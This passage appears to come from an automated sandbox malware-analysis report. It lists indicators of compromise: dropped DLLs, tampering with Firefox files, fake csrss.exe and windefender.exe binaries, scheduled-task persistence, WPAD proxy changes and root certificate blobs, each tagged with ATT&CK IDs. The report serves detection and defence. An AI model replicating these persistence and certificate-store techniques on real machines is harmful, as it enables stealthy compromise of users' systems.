File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	fzzBiVW.exe
File created	C:\Program Files (x86)\IoHaAJhEDYhU2\chRgjEW.xml	fzzBiVW.exe
File created	C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\vJLxNjU.dll	fzzBiVW.exe
File created	C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\GUGzfef.xml	fzzBiVW.exe
File created	C:\Program Files (x86)\FohpjzYDshfCC\kBxRsUP.xml	fzzBiVW.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	fzzBiVW.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	fzzBiVW.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	fzzBiVW.exe
File created	C:\Program Files (x86)\IoHaAJhEDYhU2\vNeAoyXhIcPpj.dll	fzzBiVW.exe
File created	C:\Program Files (x86)\FohpjzYDshfCC\DArRqAl.dll	fzzBiVW.exe
File created	C:\Program Files (x86)\KCGdmeQdU\NAyhcp.dll	fzzBiVW.exe
File created	C:\Program Files (x86)\KCGdmeQdU\RuJChnV.xml	fzzBiVW.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File created	C:\Windows\rss\csrss.exe	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
File created	C:\Windows\Tasks\YsLxjqvMZrWymyIEG.job	schtasks.exe
File opened for modification	C:\Windows\rss	O9P9qO4Tj2MHoOpmI7ubFOQm.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Tasks\SMPpzaSdDqsJvHF.job	schtasks.exe
File created	C:\Windows\Tasks\EtrQGzrpWMpnyWxNE.job	schtasks.exe
File created	C:\Windows\is-H9163.tmp	Derdc26BaZmmO2FnzfGzxwll.tmp
File created	C:\Windows\Tasks\bwKBwqZYjkqxftWshF.job	schtasks.exe
File created	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\unins000.dat	Derdc26BaZmmO2FnzfGzxwll.tmp
File opened for modification	C:\Windows\rss	wRnukjaj5Om8QYF5cIvTLrkH.exe
File created	C:\Windows\rss\csrss.exe	wRnukjaj5Om8QYF5cIvTLrkH.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20240204035512.cab	makecab.exe
File opened for modification	C:\Windows\unins000.dat	Derdc26BaZmmO2FnzfGzxwll.tmp

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2100	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2476	schtasks.exe
2352	schtasks.exe
2496	schtasks.exe
3012	schtasks.exe
2436	schtasks.exe
1488	schtasks.exe
2340	schtasks.exe
2628	schtasks.exe
1056	schtasks.exe
1660	schtasks.exe
1400	schtasks.exe
2304	schtasks.exe
2544	schtasks.exe
2304	schtasks.exe
1304	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	fzzBiVW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	fzzBiVW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	fzzBiVW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-522 = "N. Central Asia Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	fzzBiVW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	fzzBiVW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-14-24-d1-94-a9\WpadDecisionReason = "1"	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\06-14-24-d1-94-a9\WpadDecisionTime = 30e9d95b1e57da01	fzzBiVW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	fzzBiVW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	wRnukjaj5Om8QYF5cIvTLrkH.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time"	windefender.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 